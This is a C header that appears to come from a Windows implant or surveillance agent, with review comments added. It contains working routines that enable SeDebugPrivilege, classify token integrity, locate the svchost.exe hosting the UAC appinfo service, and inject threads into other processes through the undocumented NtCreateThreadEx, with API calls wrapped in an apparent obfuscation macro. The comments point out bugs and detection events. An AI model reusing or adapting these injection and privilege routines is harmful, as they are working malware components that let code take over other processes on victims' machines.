HM_VistaSpecific.h
/*
 * SetDebugPrivilege: enable (to_set != 0) or disable (to_set == 0)
 * SeDebugPrivilege on the current process token.
 *
 * Opens a handle to the current process and to its token, looks up the LUID
 * of SE_DEBUG_NAME and calls AdjustTokenPrivileges with a one-entry
 * TOKEN_PRIVILEGES array. FNC(...) is a wrapper macro defined elsewhere.
 *
 * The function reports nothing to the caller. The result of
 * AdjustTokenPrivileges is discarded, and that API returns TRUE even when the
 * privilege was not granted (GetLastError() == ERROR_NOT_ALL_ASSIGNED), so a
 * token that lacks the privilege fails silently here.
 *
 * NOTE(review): PROCESS_ALL_ACCESS and TOKEN_ALL_ACCESS request far more than
 * this needs; TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY on the current process is
 * enough. From a detection standpoint, enabling SeDebugPrivilege is a
 * high-signal token change: with "Audit Token Right Adjusted" enabled it
 * appears in the Security log (event 4703 on Windows 10 and later).
 */
void SetDebugPrivilege(BOOL to_set)
{
HANDLE hProc = 0, hProcToken = 0;
TOKEN_PRIVILEGES tp;
LUID luid;
// Single-pass loop: `break` jumps to the common handle cleanup below.
do {
if (! (hProc = FNC(OpenProcess)(PROCESS_ALL_ACCESS, true, FNC(GetCurrentProcessId)())))
break;
if( !FNC(OpenProcessToken)(hProc, TOKEN_ALL_ACCESS, &hProcToken) )
break;
if (!FNC(LookupPrivilegeValueA) (NULL, SE_DEBUG_NAME, &luid))
break;
ZeroMemory (&tp, sizeof (tp));
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
// Attributes = 0 clears SE_PRIVILEGE_ENABLED, i.e. disables the privilege.
if (to_set)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[0].Attributes = 0;
// Return value and ERROR_NOT_ALL_ASSIGNED are not checked (see header).
FNC(AdjustTokenPrivileges) (hProcToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
} while (FALSE);
if (hProcToken)
CloseHandle (hProcToken);
if (hProc)
CloseHandle(hProc);
}
// File-local classification of the process integrity level, written to the
// integrity_level out-parameter of IsVista(). IL_UNKNOWN is the default when
// the level cannot be determined (e.g. pre-Vista, or a failed token query).
#define IL_UNKNOWN 0
#define IL_LOW 1
#define IL_MEDIUM 2
#define IL_HIGH 3
#define IL_SYSTEM 4
// Mandatory-label RIDs (the last sub-authority of the token's integrity SID).
// These match the Windows SDK constants of the same name; they are presumably
// redefined here so the file builds with a pre-Vista SDK — a newer winnt.h
// already defines them and will warn about the redefinition.
#define SECURITY_MANDATORY_UNTRUSTED_RID (0x00000000L)
#define SECURITY_MANDATORY_LOW_RID (0x00001000L)
#define SECURITY_MANDATORY_MEDIUM_RID (0x00002000L)
#define SECURITY_MANDATORY_SYSTEM_RID (0x00004000L)
#define SECURITY_MANDATORY_PROTECTED_PROCESS_RID (0x00005000L)
#define SECURITY_MANDATORY_HIGH_RID (0x00003000L)
/*typedef struct _TOKEN_MANDATORY_LABEL {
SID_AND_ATTRIBUTES Label;
} TOKEN_MANDATORY_LABEL, *PTOKEN_MANDATORY_LABEL;*/
/*
 * IsVista: detect whether the process runs on Windows Vista or later and,
 * optionally, classify the integrity level of the current process token.
 *
 * The OS check is indirect: TOKEN_INFORMATION_CLASS value 25
 * (TokenIntegrityLevel) only exists from Vista on, so a successful
 * GetTokenInformation call for that class is taken to mean "Vista+".
 *
 * @param integrity_level  Optional out-parameter. Set to IL_UNKNOWN on entry
 *                         and, on success, to one of the IL_* codes derived
 *                         from the label SID's last sub-authority (the RID).
 * @return TRUE if the integrity-level query succeeded (Vista or later),
 *         FALSE otherwise — including when any handle/allocation step fails.
 *
 * NOTE(review): the RID comparison chain below is mis-ordered. Because
 * SECURITY_MANDATORY_SYSTEM_RID (0x4000) is >= SECURITY_MANDATORY_HIGH_RID
 * (0x3000), the `>= HIGH` branch matches first and the IL_SYSTEM branch is
 * unreachable; a SYSTEM-integrity token is reported as IL_HIGH. Untrusted
 * (0x0000) is also never classified and stays IL_UNKNOWN.
 */
BOOL IsVista(DWORD *integrity_level)
{
HANDLE hProc = 0, hProcToken = 0;
BOOL is_vista = FALSE;
PTOKEN_MANDATORY_LABEL pTIL = NULL;
DWORD dwIntegrityLevel;
DWORD dwLengthNeeded;
if (integrity_level)
*integrity_level = IL_UNKNOWN;
// Single-pass loop: `break` jumps to the common handle cleanup below.
do {
if (! (hProc = FNC(OpenProcess)(PROCESS_ALL_ACCESS, true, FNC(GetCurrentProcessId)())))
break;
if( !FNC(OpenProcessToken)(hProc, TOKEN_ALL_ACCESS, &hProcToken) )
break;
// First call with a NULL buffer only to learn the required size. Any error
// other than ERROR_INSUFFICIENT_BUFFER (presumably ERROR_INVALID_PARAMETER
// on pre-Vista, where class 25 is unknown) leaves is_vista FALSE.
if ( !FNC(GetTokenInformation)(hProcToken, (TOKEN_INFORMATION_CLASS) 25, NULL, 0, &dwLengthNeeded) ) {
if (GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
pTIL = (PTOKEN_MANDATORY_LABEL) LocalAlloc(0, dwLengthNeeded);
if (pTIL != NULL) {
if ( FNC(GetTokenInformation)(hProcToken, (TOKEN_INFORMATION_CLASS)25, pTIL, dwLengthNeeded, &dwLengthNeeded) ) {
// If GetTokenInformation succeeds for this class, we are on Vista (or later).
is_vista = TRUE;
// The integrity RID is the last sub-authority of the mandatory-label SID.
dwIntegrityLevel = *FNC(GetSidSubAuthority)(pTIL->Label.Sid, (DWORD)(UCHAR)(*FNC(GetSidSubAuthorityCount)(pTIL->Label.Sid)-1));
if (integrity_level) {
if (dwIntegrityLevel == SECURITY_MANDATORY_LOW_RID)
*integrity_level = IL_LOW;
else if (dwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID && dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID)
*integrity_level = IL_MEDIUM;
// This branch also captures SYSTEM (0x4000) and above — see header note.
else if (dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID)
*integrity_level = IL_HIGH;
// Unreachable: every value >= SYSTEM_RID was already taken by the HIGH branch.
else if (dwIntegrityLevel >= SECURITY_MANDATORY_SYSTEM_RID)
*integrity_level = IL_SYSTEM;
}
}
LocalFree(pTIL);
}
}
}
} while (FALSE);
if (hProcToken)
CloseHandle (hProcToken);
if (hProc)
CloseHandle(hProc);
return is_vista;
}
/*
 * FindRunAsService: locate the svchost.exe instance that has appinfo.dll
 * loaded, i.e. the service host of the Application Information (UAC) service.
 *
 * Walks the process list with a Toolhelp32 snapshot; for every process whose
 * image name is "svchost.exe" it takes a module snapshot and scans it for a
 * module named "appinfo.dll". Both comparisons are case-insensitive.
 *
 * @return The PID of the first matching svchost.exe, or 0 if none was found
 *         or the process snapshot could not be taken.
 *
 * NOTE(review): a module snapshot of a process the caller cannot open fails
 * with INVALID_HANDLE_VALUE and that process is silently skipped, so the
 * result depends on the caller's privileges (presumably SetDebugPrivilege is
 * expected to have run first — confirm at the call site). `stricmp` is the
 * non-standard MSVC name; `_stricmp` is the conforming spelling.
 */
DWORD FindRunAsService()
{
HANDLE hProcessSnap;
HANDLE hModuleSnap;
PROCESSENTRY32 pe32;
MODULEENTRY32 me32;
DWORD service_pid = 0;
pe32.dwSize = sizeof( PROCESSENTRY32 );
if ( (hProcessSnap = FNC(CreateToolhelp32Snapshot)( TH32CS_SNAPPROCESS, 0 )) == INVALID_HANDLE_VALUE )
return 0;
if( !FNC(Process32First)( hProcessSnap, &pe32 ) ) {
CloseHandle( hProcessSnap );
return 0;
}
// Iterate over the list of running processes
do {
// Check whether this entry is an svchost
if (stricmp("svchost.exe", pe32.szExeFile))
continue;
// Skipped (not an error) when the process cannot be snapshotted.
if ( (hModuleSnap = FNC(CreateToolhelp32Snapshot)( TH32CS_SNAPMODULE, pe32.th32ProcessID )) == INVALID_HANDLE_VALUE )
continue;
// Check whether it has the appinfo.dll module loaded
me32.dwSize = sizeof(MODULEENTRY32);
if ( FNC(Module32First)(hModuleSnap, &me32) ) {
do {
if (!stricmp("appinfo.dll", me32.szModule)) {
service_pid = pe32.th32ProcessID;
break;
}
} while(FNC(Module32Next)(hModuleSnap, &me32));
}
CloseHandle( hModuleSnap );
// Stop as soon as a match has been found
if (service_pid)
break;
} while( FNC(Process32Next)( hProcessSnap, &pe32 ) );
CloseHandle( hProcessSnap );
return service_pid;
}
// Attribute block passed as the last argument to NtCreateThreadEx (see
// VistaCreateRemoteThread). NtCreateThreadEx is an undocumented ntdll export
// and this layout is reverse-engineered: the author did not know the meaning
// of most fields, hence the Unknown* names. Do not infer semantics from them.
// With 4-byte ULONG and 4-byte pointers the struct is 36 bytes, which is the
// value hard-coded into Length by the caller; the layout is therefore
// 32-bit-specific and may not match other Windows builds or architectures.
typedef struct {
ULONG Length;
ULONG Unknown1;
ULONG Unknown2;
PULONG Unknown3;
ULONG Unknown4;
ULONG Unknown5;
ULONG Unknown6;
PULONG Unknown7;
ULONG Unknown8;
} UnkVistaTh;
// Function-pointer type for the undocumented ntdll export NtCreateThreadEx,
// resolved at run time with GetProcAddress. The prototype is not part of the
// public SDK; the DWORD return is presumably an NTSTATUS — verify before use.
typedef DWORD (WINAPI *NtCreateThreadEx_t) (PHANDLE, ACCESS_MASK, DWORD, HANDLE, LPTHREAD_START_ROUTINE, LPVOID, BOOL, DWORD, DWORD, DWORD, LPVOID);
/*
 * VistaCreateRemoteThread: create a thread in another process through the
 * undocumented ntdll export NtCreateThreadEx rather than CreateRemoteThread.
 *
 * @param hProcess        Handle to the target process.
 * @param lpStartAddress  Start routine, in the target's address space.
 * @param lpParameter     Argument passed to the start routine.
 * @return The new thread handle, or NULL if NtCreateThreadEx could not be
 *         resolved. The status returned by NtCreateThreadEx itself is
 *         discarded, so on failure the function presumably returns the
 *         still-NULL hRemoteThread — confirm, as nothing here checks it.
 *
 * NOTE(review): cross-process thread creation is the canonical code-injection
 * primitive and is exactly what kernel thread-creation callbacks report
 * (e.g. Sysmon Event ID 8); using the native export instead of the Win32
 * wrapper does not change that. Three DWORD parameters are passed as NULL
 * (pointer constant) rather than 0. GetModuleHandle's result is not checked,
 * but a NULL module makes GetProcAddress return NULL, which is handled.
 */
HANDLE VistaCreateRemoteThread(HANDLE hProcess, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter)
{
HANDLE hRemoteThread = NULL;
NtCreateThreadEx_t pNtCreateThreadEx;
UnkVistaTh thread_desc;
// Outputs written through the pointer fields of thread_desc; their meaning
// is not documented on this page (the struct fields are Unknown3/Unknown7).
DWORD dw0 = 0;
DWORD dw1 = 0;
pNtCreateThreadEx = (NtCreateThreadEx_t) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtCreateThreadEx" );
if (!pNtCreateThreadEx)
return NULL;
ZeroMemory(&thread_desc, sizeof(thread_desc));
// 36 == sizeof(UnkVistaTh) on a 32-bit build only; the remaining constants
// are reverse-engineered magic values whose meaning is not known here.
thread_desc.Length = 36;
thread_desc.Unknown1 = 0x10003;
thread_desc.Unknown2 = 0x8;
thread_desc.Unknown3 = &dw0;
thread_desc.Unknown4 = 0;
thread_desc.Unknown5 = 0x10004;
thread_desc.Unknown6 = 4;
thread_desc.Unknown7 = &dw1;
thread_desc.Unknown8 = 0;
// 0x1FFFFF is the desired-access mask for the new thread handle (all thread
// access rights). Return status ignored — see header.
pNtCreateThreadEx (&hRemoteThread, 0x1FFFFF, NULL, hProcess, lpStartAddress,
lpParameter, FALSE, NULL, NULL, NULL, &thread_desc);
return hRemoteThread;
}